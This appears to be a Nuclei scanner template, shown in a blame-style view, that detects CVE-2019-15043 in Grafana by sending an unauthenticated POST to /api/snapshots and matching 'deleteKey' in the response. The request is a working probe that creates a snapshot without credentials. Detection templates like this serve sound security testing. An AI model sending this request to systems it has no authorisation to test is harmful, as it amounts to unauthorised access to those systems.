2021-01-02 04:59:06 +00:00
|
|
|
id: CVE-2019-15043
|
2020-07-04 13:05:56 +00:00
|
|
|
info:
|
|
|
|
author: bing0o
|
|
|
|
name: Grafana unauthenticated API
|
|
|
|
severity: medium
|
|
|
|
requests:
|
|
|
|
- body: >-
|
|
|
|
{"dashboard":
|
|
|
|
{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows":
|
|
|
|
[{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires":
|
|
|
|
3600}
|
|
|
|
headers:
|
|
|
|
Content-Type: application/json
|
|
|
|
Host: '{{Hostname}}'
|
|
|
|
User-Agent: Mozilla/5.0
|
|
|
|
matchers:
|
|
|
|
- part: body
|
|
|
|
type: word
|
|
|
|
words:
|
|
|
|
- deleteKey
|
|
|
|
method: POST
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/api/snapshots'
|